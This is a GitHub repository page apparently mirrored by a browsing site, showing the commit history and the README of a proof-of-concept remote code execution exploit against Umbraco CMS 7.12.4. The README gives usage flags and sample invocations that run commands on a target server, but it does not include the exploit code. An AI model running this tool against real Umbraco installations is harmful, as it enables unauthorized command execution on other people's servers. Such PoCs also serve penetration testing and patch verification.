GitXplorerGitXplorer
n

Umbraco-RCE

public
75 stars
40 forks
0 issues

Commits

List of commits on branch master.
Verified
b2ee3d9579118ca12d28787b072afa9261e76f7e

add EDB exploit

nnoraj committed 4 years ago
Verified
c88f2f6131bb8abfa4b3600f8d8ecfc47ef1d9d8

add exploit links

nnoraj committed 4 years ago
Verified
55b3d603955c83d10d30f9a9ee52698913c5d725

simple pip requirements file (#5)

eedrapac committed 5 years ago
Verified
ed3cf40e8962b0efd51834d1bf0f81dd9a5fb167

Update README.md

nnoraj committed 5 years ago
Verified
e95ad31dfdcb6bb000aa0057c568184c0422be89

add Requirements

nnoraj committed 5 years ago
Verified
06223ea1454b7aa22a051d691ad8a044587c9b40

add arguments

nnoraj committed 5 years ago

README

The README file for this repository.

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.

Tested with python 3.8.